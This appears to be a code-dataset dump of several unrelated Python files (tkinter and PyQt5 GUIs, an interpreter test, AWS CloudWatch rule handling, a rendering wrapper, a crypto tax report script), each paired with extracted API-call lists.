torch_geometric.transforms as T\n'), ((3464, 3482), 'torch_geometric.transforms.NormalizeScale', 'T.NormalizeScale', ([], {}), '()\n', (3480, 3482), True, 'import torch_geometric.transforms as T\n'), ((4243, 4270), 'torch.nn.CrossEntropyLoss', 'torch.nn.CrossEntropyLoss', ([], {}), '()\n', (4268, 4270), False, 'import torch\n'), ((6314, 6323), 'config.OptInit', 'OptInit', ([], {}), '()\n', (6321, 6323), False, 'from config import OptInit\n'), ((2413, 2455), 'numpy.logical_and', 'np.logical_and', (['cur_pred_mask', 'cur_gt_mask'], {}), '(cur_pred_mask, cur_gt_mask)\n', (2427, 2455), True, 'import numpy as np\n'), ((2502, 2543), 'numpy.logical_or', 'np.logical_or', (['cur_pred_mask', 'cur_gt_mask'], {}), '(cur_pred_mask, cur_gt_mask)\n', (2515, 2543), True, 'import numpy as np\n'), ((3881, 3904), 'architecture.CustomDenseDeepGCN', 'CustomDenseDeepGCN', (['opt'], {}), '(opt)\n', (3899, 3904), False, 'from architecture import DenseDeepGCN, CustomDenseDeepGCN\n')] |
import tkinter as tk
from tkinter import ttk
win = tk.Tk()
win.title("Python GUI")
win.resizable(False, False)
win.configure(background = "grey94")
a_label = ttk.Label(win, text = "Gib Deinen Namen ein:")
a_label.grid(column = 0, row = 0)
a_label.grid_configure(padx = 8, pady = 8)
def clickMe():
action.configure(text = "Hallöchen " + name.get())
name = tk.StringVar()
name_entered = ttk.Entry(win, width = 12, textvariable = name)
name_entered.grid(column = 0, row = 1)
name_entered.grid_configure(padx = 8, pady = 8)
name_entered.focus()
action = ttk.Button(win, text = "Drück mich!", command = clickMe)
action.grid(column = 1, row = 1)
action.grid_configure(padx = 8, pady = 8)
win.mainloop() | [
"tkinter.ttk.Button",
"tkinter.ttk.Entry",
"tkinter.ttk.Label",
"tkinter.StringVar",
"tkinter.Tk"
] | [((52, 59), 'tkinter.Tk', 'tk.Tk', ([], {}), '()\n', (57, 59), True, 'import tkinter as tk\n'), ((160, 204), 'tkinter.ttk.Label', 'ttk.Label', (['win'], {'text': '"""Gib Deinen Namen ein:"""'}), "(win, text='Gib Deinen Namen ein:')\n", (169, 204), False, 'from tkinter import ttk\n'), ((363, 377), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (375, 377), True, 'import tkinter as tk\n'), ((393, 436), 'tkinter.ttk.Entry', 'ttk.Entry', (['win'], {'width': '(12)', 'textvariable': 'name'}), '(win, width=12, textvariable=name)\n', (402, 436), False, 'from tkinter import ttk\n'), ((559, 611), 'tkinter.ttk.Button', 'ttk.Button', (['win'], {'text': '"""Drück mich!"""', 'command': 'clickMe'}), "(win, text='Drück mich!', command=clickMe)\n", (569, 611), False, 'from tkinter import ttk\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src/gui/ui_paste_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PasteDialog(object):
def setupUi(self, PasteDialog):
PasteDialog.setObjectName("PasteDialog")
PasteDialog.resize(403, 205)
self.gridLayout = QtWidgets.QGridLayout(PasteDialog)
self.gridLayout.setContentsMargins(11, 11, 11, 11)
self.gridLayout.setSpacing(6)
self.gridLayout.setObjectName("gridLayout")
self.buttonGroupMain = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupMain.setObjectName("buttonGroupMain")
self.radioReplaceSelection = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioReplaceSelection.setGeometry(QtCore.QRect(10, 40, 120, 20))
self.radioReplaceSelection.setObjectName("radioReplaceSelection")
self.radioAddLines = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioAddLines.setGeometry(QtCore.QRect(10, 20, 100, 20))
self.radioAddLines.setChecked(True)
self.radioAddLines.setObjectName("radioAddLines")
self.gridLayout.addWidget(self.buttonGroupMain, 0, 0, 1, 1)
self.buttonGroupReplace = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupReplace.setEnabled(False)
self.buttonGroupReplace.setObjectName("buttonGroupReplace")
self.verticalLayout = QtWidgets.QVBoxLayout(self.buttonGroupReplace)
self.verticalLayout.setContentsMargins(11, 11, 11, 11)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.radioSelectionOnly = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionOnly.setObjectName("radioSelectionOnly")
self.verticalLayout.addWidget(self.radioSelectionOnly)
self.radioSelectionAndReplace = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndReplace.setObjectName("radioSelectionAndReplace")
self.verticalLayout.addWidget(self.radioSelectionAndReplace)
self.radioSelectionAndAdd = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndAdd.setChecked(True)
self.radioSelectionAndAdd.setObjectName("radioSelectionAndAdd")
self.verticalLayout.addWidget(self.radioSelectionAndAdd)
self.gridLayout.addWidget(self.buttonGroupReplace, 0, 1, 2, 1)
self.buttonGroupAdd = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupAdd.setEnabled(True)
self.buttonGroupAdd.setObjectName("buttonGroupAdd")
self.radioAfterSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioAfterSelection.setGeometry(QtCore.QRect(10, 40, 130, 20))
self.radioAfterSelection.setObjectName("radioAfterSelection")
self.radioBeforeSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioBeforeSelection.setGeometry(QtCore.QRect(10, 20, 140, 20))
self.radioBeforeSelection.setChecked(True)
self.radioBeforeSelection.setObjectName("radioBeforeSelection")
self.gridLayout.addWidget(self.buttonGroupAdd, 1, 0, 1, 1)
self.pushOk = QtWidgets.QPushButton(PasteDialog)
self.pushOk.setObjectName("pushOk")
self.gridLayout.addWidget(self.pushOk, 2, 0, 1, 1)
self.pushCancel = QtWidgets.QPushButton(PasteDialog)
self.pushCancel.setObjectName("pushCancel")
self.gridLayout.addWidget(self.pushCancel, 2, 1, 1, 1)
self.retranslateUi(PasteDialog)
self.pushOk.clicked.connect(PasteDialog.accept)
self.pushCancel.clicked.connect(PasteDialog.reject)
self.radioAddLines.toggled['bool'].connect(self.buttonGroupAdd.setEnabled)
self.radioReplaceSelection.toggled['bool'].connect(self.buttonGroupReplace.setEnabled)
QtCore.QMetaObject.connectSlotsByName(PasteDialog)
def retranslateUi(self, PasteDialog):
_translate = QtCore.QCoreApplication.translate
PasteDialog.setWindowTitle(_translate("PasteDialog", "Paste mode"))
self.buttonGroupMain.setTitle(_translate("PasteDialog", "Pasting mode"))
self.radioReplaceSelection.setText(_translate("PasteDialog", "Replace selection"))
self.radioAddLines.setText(_translate("PasteDialog", "Add lines"))
self.buttonGroupReplace.setTitle(_translate("PasteDialog", "How do you want to replace lines ?"))
self.radioSelectionOnly.setText(_translate("PasteDialog", "Selection only"))
self.radioSelectionAndReplace.setText(_translate("PasteDialog", "If selection is too small, replace\n"
"the lines after"))
self.radioSelectionAndAdd.setText(_translate("PasteDialog", "If selection is too small, \n"
"add new lines"))
self.buttonGroupAdd.setTitle(_translate("PasteDialog", "Where do you want to add lines ?"))
self.radioAfterSelection.setText(_translate("PasteDialog", "After selection"))
self.radioBeforeSelection.setText(_translate("PasteDialog", "Before selection"))
self.pushOk.setText(_translate("PasteDialog", "OK"))
self.pushCancel.setText(_translate("PasteDialog", "Cancel"))
| [
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtWidgets.QRadioButton",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QGridLayout",
"PyQt5.QtWidgets.QGroupBox",
"PyQt5.QtWidgets.QVBoxLayout",
"PyQt5.QtWidgets.QPushButton"
] | [((434, 468), 'PyQt5.QtWidgets.QGridLayout', 'QtWidgets.QGridLayout', (['PasteDialog'], {}), '(PasteDialog)\n', (455, 468), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((649, 681), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['PasteDialog'], {}), '(PasteDialog)\n', (668, 681), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((781, 825), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupMain'], {}), '(self.buttonGroupMain)\n', (803, 825), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1007, 1051), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupMain'], {}), '(self.buttonGroupMain)\n', (1029, 1051), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1326, 1358), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['PasteDialog'], {}), '(PasteDialog)\n', (1345, 1358), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1507, 1553), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self.buttonGroupReplace'], {}), '(self.buttonGroupReplace)\n', (1528, 1553), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1753, 1800), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupReplace'], {}), '(self.buttonGroupReplace)\n', (1775, 1800), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1972, 2019), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupReplace'], {}), '(self.buttonGroupReplace)\n', (1994, 2019), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2205, 2252), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupReplace'], {}), '(self.buttonGroupReplace)\n', (2227, 2252), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2542, 2574), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['PasteDialog'], {}), '(PasteDialog)\n', (2561, 2574), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2715, 2758), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupAdd'], {}), '(self.buttonGroupAdd)\n', (2737, 2758), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2941, 2984), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.buttonGroupAdd'], {}), '(self.buttonGroupAdd)\n', (2963, 2984), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3274, 3308), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['PasteDialog'], {}), '(PasteDialog)\n', (3295, 3308), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3438, 3472), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['PasteDialog'], {}), '(PasteDialog)\n', (3459, 3472), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3931, 3981), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['PasteDialog'], {}), '(PasteDialog)\n', (3968, 3981), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((873, 902), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(40)', '(120)', '(20)'], {}), '(10, 40, 120, 20)\n', (885, 902), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1091, 1120), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(20)', '(100)', '(20)'], {}), '(10, 20, 100, 20)\n', (1103, 1120), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2804, 2833), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(40)', '(130)', '(20)'], {}), '(10, 40, 130, 20)\n', (2816, 2833), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3031, 3060), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(20)', '(140)', '(20)'], {}), '(10, 20, 140, 20)\n', (3043, 3060), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')] |
from yalul.interpreters.environment import Environment
from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter
from yalul.interpreters.interpreter_errors import InterpreterErrors
class TestVarAssignmentInterpreter:
"""Test var assignment expression interpreter"""
def test_interpreting_var_assignment_without_errors(self):
"""
Validates if VarAssignmentInterpreter is interpreting correctly
"""
error = InterpreterErrors()
env = Environment({}, {})
env.add_variable('Name', 'Gabriela')
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response == 'Otavio'
assert env.get_variable('Name') == 'Otavio'
assert error.errors == []
def test_interpreting_var_assignment_errors(self):
"""
Validates if VarAssignmentInterpreter is generating errors when variable don't exists
"""
error = InterpreterErrors()
env = Environment({}, {})
interpreter = VarAssignmentInterpreter('Name', 'Otavio', env, error)
response = interpreter.execute()
assert response is None
assert error.errors == ['Interpreter Error: Can\'t assign value Otavio to variable named "Name" because it '
'doesn\'t exists']
| [
"yalul.interpreters.expressions.var_assignment_interpreter.VarAssignmentInterpreter",
"yalul.interpreters.environment.Environment",
"yalul.interpreters.interpreter_errors.InterpreterErrors"
] | [((485, 504), 'yalul.interpreters.interpreter_errors.InterpreterErrors', 'InterpreterErrors', ([], {}), '()\n', (502, 504), False, 'from yalul.interpreters.interpreter_errors import InterpreterErrors\n'), ((519, 538), 'yalul.interpreters.environment.Environment', 'Environment', (['{}', '{}'], {}), '({}, {})\n', (530, 538), False, 'from yalul.interpreters.environment import Environment\n'), ((608, 662), 'yalul.interpreters.expressions.var_assignment_interpreter.VarAssignmentInterpreter', 'VarAssignmentInterpreter', (['"""Name"""', '"""Otavio"""', 'env', 'error'], {}), "('Name', 'Otavio', env, error)\n", (632, 662), False, 'from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter\n'), ((1018, 1037), 'yalul.interpreters.interpreter_errors.InterpreterErrors', 'InterpreterErrors', ([], {}), '()\n', (1035, 1037), False, 'from yalul.interpreters.interpreter_errors import InterpreterErrors\n'), ((1052, 1071), 'yalul.interpreters.environment.Environment', 'Environment', (['{}', '{}'], {}), '({}, {})\n', (1063, 1071), False, 'from yalul.interpreters.environment import Environment\n'), ((1095, 1149), 'yalul.interpreters.expressions.var_assignment_interpreter.VarAssignmentInterpreter', 'VarAssignmentInterpreter', (['"""Name"""', '"""Otavio"""', 'env', 'error'], {}), "('Name', 'Otavio', env, error)\n", (1119, 1149), False, 'from yalul.interpreters.expressions.var_assignment_interpreter import VarAssignmentInterpreter\n')] |
import boto3
from django.conf import settings
from backend.models import CloudWatchEvent
import json
class Events:
def __init__(self):
self.client = boto3.client('events', region_name=settings.NARUKO_REGION)
def list_rules(self):
response = []
for rules in self._list_rules():
response.extend(rules)
return response
def _list_rules(self):
# 最初はTokenなし
response = self.client.list_rules(NamePrefix='NARUKO-')
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
# Tokenがあれば次ページを返す
while token:
response = self.client.list_rules(
NamePrefix='NARUKO-',
NextToken=token
)
token = response.get("NextToken")
yield self._build_cloudwatchevent(response["Rules"])
@staticmethod
def _build_cloudwatchevent(rules: dict):
cloudwatchevents = []
for rule in rules:
cloudwatchevents.append(CloudWatchEvent(
name=rule["Name"],
schedule_expression=rule.get("ScheduleExpression"),
is_active=rule["State"] == "ENABLED"
))
return cloudwatchevents
def save_event(self, event):
# ルール作成
self.client.put_rule(
Name=event.cloudwatchevent.name,
ScheduleExpression=event.cloudwatchevent.schedule_expression,
State="ENABLED" if event.cloudwatchevent.is_active else "DISABLED"
)
# ターゲット作成
target = dict(
Id=event.cloudwatchevent.name,
Arn=settings.EVENT_SNS_TOPIC_ARN,
Input=json.dumps(dict(id=event.event_model.id))
)
self.client.put_targets(
Rule=event.cloudwatchevent.name,
Targets=[target]
)
return event
def delete_event(self, event_name):
# ターゲット削除
self.client.remove_targets(
Rule=event_name,
Ids=[event_name]
)
# ルール削除
self.client.delete_rule(
Name=event_name
)
def describe_event(self, event_name):
response = self.client.describe_rule(
Name=event_name
)
return CloudWatchEvent(
name=response["Name"],
schedule_expression=response["ScheduleExpression"],
is_active=response["State"] == "ENABLED"
)
| [
"boto3.client",
"backend.models.CloudWatchEvent"
] | [((173, 231), 'boto3.client', 'boto3.client', (['"""events"""'], {'region_name': 'settings.NARUKO_REGION'}), "('events', region_name=settings.NARUKO_REGION)\n", (185, 231), False, 'import boto3\n'), ((2363, 2500), 'backend.models.CloudWatchEvent', 'CloudWatchEvent', ([], {'name': "response['Name']", 'schedule_expression': "response['ScheduleExpression']", 'is_active': "(response['State'] == 'ENABLED')"}), "(name=response['Name'], schedule_expression=response[\n 'ScheduleExpression'], is_active=response['State'] == 'ENABLED')\n", (2378, 2500), False, 'from backend.models import CloudWatchEvent\n')] |
#!/usr/bin/env python
# Manipulate sys.path to be able to import converscript from this local git
# repository.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
from converscript import RiveScript
import json
bot = RiveScript()
bot.load_file("example.rive")
dep = bot.deparse()
print(json.dumps(dep, indent=2))
| [
"os.path.dirname",
"json.dumps",
"converscript.RiveScript"
] | [((259, 271), 'converscript.RiveScript', 'RiveScript', ([], {}), '()\n', (269, 271), False, 'from converscript import RiveScript\n'), ((329, 354), 'json.dumps', 'json.dumps', (['dep'], {'indent': '(2)'}), '(dep, indent=2)\n', (339, 354), False, 'import json\n'), ((163, 188), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (178, 188), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('modules', '0002_module_floor'),
]
operations = [
migrations.AddField(
model_name='module',
name='shortcut',
field=models.BooleanField(default=False),
),
]
| [
"django.db.models.BooleanField"
] | [((346, 380), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (365, 380), False, 'from django.db import models, migrations\n')] |
import abc
import argparse
import logging
import pathlib
from collections import namedtuple
from operator import itemgetter
import toml
class NotConfiguredError(Exception):
pass
class ParseError(Exception):
pass
class Model(abc.ABC):
"""Interface for model that can save/load parameters.
Each model class should have an ``_add_argument`` class method to define
model arguments along with their types, default values, etc.
"""
@classmethod
@abc.abstractmethod
def add_arguments(cls, parser: argparse.ArgumentParser):
"""Add arguments to an argparse subparser."""
raise NotImplementedError
@classmethod
def build(cls, **kwargs):
"""Build model. Parameters are specified by keyword arguments.
Example:
>>> from models import Simple
>>> model = Simple.build(foo=3)
>>> print(model.config)
Config(foo=3)
"""
keys, values = zip(*sorted(list(kwargs.items()), key=itemgetter(0)))
config = namedtuple(cls.__name__, keys)(*values)
return cls(config)
@classmethod
def parse(cls, args):
"""Parse command-line options and build model."""
class _ArgumentParser(argparse.ArgumentParser):
def error(self, message):
raise ParseError(message)
parser = _ArgumentParser(prog='', add_help=False)
cls.add_arguments(parser)
args = parser.parse_args(args)
config = dict(args._get_kwargs())
Model._unfold_config(config)
return cls.build(**config)
def __init__(self, config):
"""
Args:
config (namedtuple): model configuration
"""
self.config = config
def __str__(self):
return str(self.config)
@staticmethod
def _unfold_config(cfg):
for k, v in list(cfg.items()):
if isinstance(v, dict):
Model._unfold_config(v)
if '.' not in k:
continue
d = cfg
for sec in k.split('.')[:-1]:
if sec in d:
d = d[sec]
else:
d[sec] = {}
d = d[sec]
d[k.split('.')[-1]] = v
del cfg[k]
class Workspace:
"""Workspace utilities. One can save/load configurations, build models
with specific configuration, save snapshots, open results, etc., using
workspace objects."""
def __init__(self, path: str, model=None, config=None):
self._path = pathlib.Path(path)
self._log_path = self._path / 'log'
self._snapshot_path = self._path / 'snapshot'
self._result_path = self._path / 'result'
if model is None:
self._model_cls = None
self._config = None
return
if config is None:
config = {}
self._set_model(model, config)
self._save()
def __str__(self):
return str(self.path)
def __repr__(self):
return 'Workspace(path=' + str(self.path) + ')'
def _set_model(self, model, config):
if isinstance(model, str):
self._model_cls = Workspace._get_class(model)
else:
self._model_cls = model
self._config = config
@staticmethod
def _get_class(name):
from . import models as mm
return getattr(mm, name)
@property
def path(self):
if not self._path.exists():
self._path.mkdir(parents=True)
return self._path
@property
def result_path(self):
if not self._result_path.exists():
self._result_path.mkdir(parents=True)
return self._result_path
@property
def snapshot_path(self):
if not self._snapshot_path.exists():
self._snapshot_path.mkdir(parents=True)
return self._snapshot_path
@property
def log_path(self):
if not self._log_path.exists():
self._log_path.mkdir(parents=True)
return self._log_path
@property
def model_name(self):
return self.model_cls.__name__
@property
def model_cls(self):
if self._model_cls is not None:
return self._model_cls
self._load()
return self._model_cls
@property
def config(self):
if self._config is not None:
return self._config
self._load()
return self._config
def setup_like(self, model: Model):
"""Configure workspace with configurations from a given model.
Args:
model (Model): model to be used
"""
self._set_model(model.__class__, model.config._asdict())
def build_model(self):
"""Build model according to the configurations in current
workspace."""
return self.model_cls.build(**self.config)
def logger(self, name: str):
"""Get a logger that logs to a file.
Notice that same logger instance is returned for same names.
Args:
name(str): logger name
"""
logger = logging.getLogger(name)
if logger.handlers:
# previously configured, remain unchanged
return logger
fileFormatter = logging.Formatter('%(levelname)s [%(name)s] '
'%(asctime)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
fileHandler = logging.FileHandler(
str(self.log_path / (name + '.log')))
fileHandler.setFormatter(fileFormatter)
logger.addHandler(fileHandler)
return logger
def _load(self):
"""Load configuration."""
try:
cfg = toml.load((self.path / 'config.toml').open())
self._set_model(cfg['model_name'], cfg[cfg['model_name'].lower()])
except (FileNotFoundError, KeyError):
raise NotConfiguredError('config.toml doesn\'t exist or '
'is incomplete')
def _save(self):
"""Save configuration."""
f = (self.path / 'config.toml').open('w')
toml.dump({'model_name': self.model_name,
self.model_name.lower(): self.config}, f)
f.close()
class Command(abc.ABC):
"""Command interface."""
def __init__(self, parser):
self.parser = parser
def _run(self, args):
ws = Workspace(args.workspace)
cmd = args.command
del args.command, args.func, args.workspace
args = {name: value for (name, value) in args._get_kwargs()}
args = namedtuple(cmd.capitalize(), args.keys())(*args.values())
return self.run(ws, args)
@abc.abstractmethod
def run(self, ws, args):
raise NotImplementedError
| [
"logging.getLogger",
"collections.namedtuple",
"pathlib.Path",
"logging.Formatter",
"operator.itemgetter"
] | [((2561, 2579), 'pathlib.Path', 'pathlib.Path', (['path'], {}), '(path)\n', (2573, 2579), False, 'import pathlib\n'), ((5102, 5125), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (5119, 5125), False, 'import logging\n'), ((5258, 5360), 'logging.Formatter', 'logging.Formatter', (['"""%(levelname)s [%(name)s] %(asctime)s %(message)s"""'], {'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "('%(levelname)s [%(name)s] %(asctime)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n", (5275, 5360), False, 'import logging\n'), ((1040, 1070), 'collections.namedtuple', 'namedtuple', (['cls.__name__', 'keys'], {}), '(cls.__name__, keys)\n', (1050, 1070), False, 'from collections import namedtuple\n'), ((1007, 1020), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (1017, 1020), False, 'from operator import itemgetter\n')] |
import os
import subprocess
import threading
mutex = threading.Lock()
def render_appleseed(target_file, base_color_tex, normal_tex, roughness_tex, metallic_tex, resolution, appleseed_path):
mutex.acquire()
try:
# Read the template file from disk.
with open("scene_template.appleseed", "r") as file:
project_text = file.read()
# Substitute variables by their values.
project_text = project_text.replace("$baseColorTexturePath", base_color_tex)
project_text = project_text.replace("$normalTexturePath", normal_tex)
project_text = project_text.replace("$roughnessTexturePath", roughness_tex)
project_text = project_text.replace("$metallicTexturePath", metallic_tex)
project_text = project_text.replace("$frameWidth", str(resolution[0]))
project_text = project_text.replace("$frameHeight", str(resolution[1]))
# Write the new project file to disk.
project_file = os.path.splitext(target_file)[0] + ".appleseed"
with open(project_file, "w") as file:
file.write(project_text)
# Invoke appleseed to render the project file.
appleseed_cli_path = os.path.join(appleseed_path, "bin", "appleseed.cli.exe" if os.name == "nt" else "appleseed.cli")
subprocess.check_call([appleseed_cli_path, "--message-verbosity", "error", project_file, "--output", target_file])
except Exception as e:
print("Failed to generate {0} with appleseed: {1}".format(target_file, e))
raise
finally:
mutex.release()
| [
"threading.Lock",
"os.path.splitext",
"os.path.join",
"subprocess.check_call"
] | [((54, 70), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (68, 70), False, 'import threading\n'), ((1189, 1289), 'os.path.join', 'os.path.join', (['appleseed_path', '"""bin"""', "('appleseed.cli.exe' if os.name == 'nt' else 'appleseed.cli')"], {}), "(appleseed_path, 'bin', 'appleseed.cli.exe' if os.name == 'nt' else\n 'appleseed.cli')\n", (1201, 1289), False, 'import os\n'), ((1294, 1412), 'subprocess.check_call', 'subprocess.check_call', (["[appleseed_cli_path, '--message-verbosity', 'error', project_file,\n '--output', target_file]"], {}), "([appleseed_cli_path, '--message-verbosity', 'error',\n project_file, '--output', target_file])\n", (1315, 1412), False, 'import subprocess\n'), ((973, 1002), 'os.path.splitext', 'os.path.splitext', (['target_file'], {}), '(target_file)\n', (989, 1002), False, 'import os\n')] |
from ubuntui.utils import Padding
from ubuntui.widgets.hr import HR
from conjureup.app_config import app
from conjureup.ui.views.base import BaseView, SchemaFormView
from conjureup.ui.widgets.selectors import MenuSelectButtonList
class NewCredentialView(SchemaFormView):
title = "New Credential Creation"
def __init__(self, *args, **kwargs):
cloud_type = app.provider.cloud_type.upper()
self.subtitle = "Enter your {} credentials".format(cloud_type)
super().__init__(*args, **kwargs)
class CredentialPickerView(BaseView):
title = "Choose a Credential"
subtitle = "Please select an existing credential, " \
"or choose to add a new one."
footer = 'Please press [ENTER] on highlighted credential to proceed.'
def __init__(self, credentials, default, submit_cb, back_cb):
self.credentials = credentials
self.default = default
self.submit_cb = submit_cb
self.prev_screen = back_cb
super().__init__()
def build_widget(self):
widget = MenuSelectButtonList(self.credentials, self.default)
widget.append(Padding.line_break(""))
widget.append(HR())
widget.append_option("Add a new credential", None)
return widget
def submit(self):
self.submit_cb(self.widget.selected)
| [
"ubuntui.widgets.hr.HR",
"conjureup.ui.widgets.selectors.MenuSelectButtonList",
"ubuntui.utils.Padding.line_break",
"conjureup.app_config.app.provider.cloud_type.upper"
] | [((375, 406), 'conjureup.app_config.app.provider.cloud_type.upper', 'app.provider.cloud_type.upper', ([], {}), '()\n', (404, 406), False, 'from conjureup.app_config import app\n'), ((1051, 1103), 'conjureup.ui.widgets.selectors.MenuSelectButtonList', 'MenuSelectButtonList', (['self.credentials', 'self.default'], {}), '(self.credentials, self.default)\n', (1071, 1103), False, 'from conjureup.ui.widgets.selectors import MenuSelectButtonList\n'), ((1126, 1148), 'ubuntui.utils.Padding.line_break', 'Padding.line_break', (['""""""'], {}), "('')\n", (1144, 1148), False, 'from ubuntui.utils import Padding\n'), ((1172, 1176), 'ubuntui.widgets.hr.HR', 'HR', ([], {}), '()\n', (1174, 1176), False, 'from ubuntui.widgets.hr import HR\n')] |
#!/usr/bin/env python3
import transactions
import taxmap
import db
import settings
import datetime
import argparse
import uuid
import pickle
import jsonpickle
import logging
import logging.handlers
import traceback
def main():
handler = logging.handlers.RotatingFileHandler('../main.log', maxBytes=33554432, backupCount=10)
logging.basicConfig(handlers=[handler], level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logging.info('We got a report request')
parser = argparse.ArgumentParser()
parser.add_argument("wallet", help="The evm compatible wallet address to generate for")
parser.add_argument("startDate", help="The starting date for the report")
parser.add_argument("endDate", help="The ending date for the report")
parser.add_argument("--costbasis", choices=['fifo','lifo','hifo','acb'], help="Method for mapping cost basis to gains")
parser.add_argument("--chains", choices=['1','2','3','4','5','6','7'], help="Bitwise integer of blockchains to include 1=Harmony,2=Avax,4=DFKChain")
args = parser.parse_args()
if args.costbasis == None:
costBasis = 'fifo'
else:
costBasis = args.costbasis
page_size = settings.TX_PAGE_SIZE
txResult = 0
txData = []
moreOptions = db.ReportOptions()
# list of transactions if loaded from file if available, otherwise fetched
reportInfo = db.findReport(args.wallet, args.startDate, args.endDate)
if reportInfo != None and reportInfo[5] > 0 and len(reportInfo[8]) > 0:
includedChains = reportInfo[12]
with open('../transactions/{0}'.format(reportInfo[8]), 'rb') as file:
txData = pickle.load(file)
else:
# generate.py pre-generates report record, but if running outside of that, create one
if reportInfo == None:
generateTime = datetime.datetime.now()
txResult = transactions.getTransactionCount(args.wallet)
includedChains = 1
db.createReport(args.wallet, args.startDate, args.endDate, int(datetime.datetime.timestamp(generateTime)), txResult, costBasis, includedChains, 1)
else:
includedChains = reportInfo[12]
try:
moreOptions = jsonpickle.loads(reportInfo[13])
except Exception as err:
logging.warning('Ignoring failure to load more options, probably old ui not setting it.')
logging.info('Loading transactions list for {0}'.format(args.wallet))
# Scale up default page size for very large accounts
if reportInfo != None and reportInfo[4] > page_size*50:
page_size = min(1000, page_size*5)
try:
txData = transactions.getTransactionList(args.wallet, args.startDate, args.endDate, page_size, includedChains)
except Exception as err:
logging.error('Unexpected Error {0} fetching transaction list, setting report to failure.'.format(err))
traceback.print_exc()
db.updateReportError(args.wallet, args.startDate, args.endDate, 8)
return 1
# The transactions are written to a file and record updated indicate fetching complete
transactionsFile = uuid.uuid4().hex
with open('../transactions/{0}'.format(transactionsFile), 'wb') as f:
pickle.dump(txData, f)
try:
db.completeTransactions(args.wallet, args.startDate, args.endDate, transactionsFile)
except Exception as err:
logging.error('DB report update tx complete failure: {0}'.format(str(err)))
